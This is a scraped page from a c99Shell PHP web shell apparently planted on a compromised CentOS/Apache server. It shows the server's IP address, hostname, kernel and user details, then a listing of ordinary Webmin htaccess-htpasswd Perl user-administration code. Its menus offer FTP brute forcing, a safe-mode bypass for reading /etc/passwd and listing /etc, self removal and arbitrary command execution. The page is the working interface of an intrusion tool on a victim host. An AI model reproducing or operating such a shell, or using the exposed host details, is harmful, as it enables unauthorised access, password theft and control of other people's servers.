110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/libexec/webmin/htaccess-htpasswd/ drwxr-xr-x Free 50.94 GB of 127.8 GB (39.85%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/usr/libexec/webmin/htaccess-htpasswd/ drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.85%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout



do 'htaccess-lib.pl';

sub useradmin_create_user
{
foreach $dir (&list_directories()) {
    next if ($dir->[3] !~ /create/);
    local $users = &list_users($dir->[1]);
    local ($clash) = grep { $_->{'user'} eq $_[0]->{'user'} } @$users;
    return if ($clash);
    &lock_file($dir->[1]);
    local $user = { 'user' => $_[0]->{'user'},
            'enabled' => 1 };
    if ($_[0]->{'passmode'} == 0) {
        $user->{'pass'} = "";
        }
    elsif ($_[0]->{'passmode'} == 1) {
        $user->{'pass'} = "*LK*";
        }
    elsif ($_[0]->{'passmode'} == 2) {
        $user->{'pass'} = $_[0]->{'pass'};
        }
    else {
        $user->{'pass'} = &encrypt_password($_[0]->{'plainpass'},
                            undef, $config{'md5'});
        }
    &create_user($user, $dir->[1]);
    &unlock_file($dir->[1]);
    }
}

sub useradmin_modify_user
{
foreach $dir (&list_directories()) {
    next if ($dir->[3] !~ /update/);
    local $users = &list_users($dir->[1]);
    local ($user) = grep { $_->{'user'} eq $_[0]->{'olduser'} } @$users;
    return if (!$user);
    &lock_file($dir->[1]);
    $user->{'user'} = $_[0]->{'user'};
    if ($_[0]->{'passmode'} == 0) {
        $user->{'pass'} = "";
        }
    elsif ($_[0]->{'passmode'} == 1) {
        $user->{'pass'} = "*LK*";
        }
    elsif ($_[0]->{'passmode'} == 2) {
        $user->{'pass'} = $_[0]->{'pass'};
        }
    elsif ($_[0]->{'passmode'} == 3) {
        $user->{'pass'} = &encrypt_password($_[0]->{'plainpass'},
                            undef, $config{'md5'});
        }
    &modify_user($user);
    &unlock_file($dir->[1]);
    }
}

sub useradmin_delete_user
{
foreach $dir (&list_directories()) {
    next if ($dir->[3] !~ /update/);
    local $users = &list_users($dir->[1]);
    local ($user) = grep { $_->{'user'} eq $_[0]->{'user'} } @$users;
    return if (!$user);
    &lock_file($dir->[1]);
    &delete_user($user);
    &unlock_file($dir->[1]);
    }
}

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: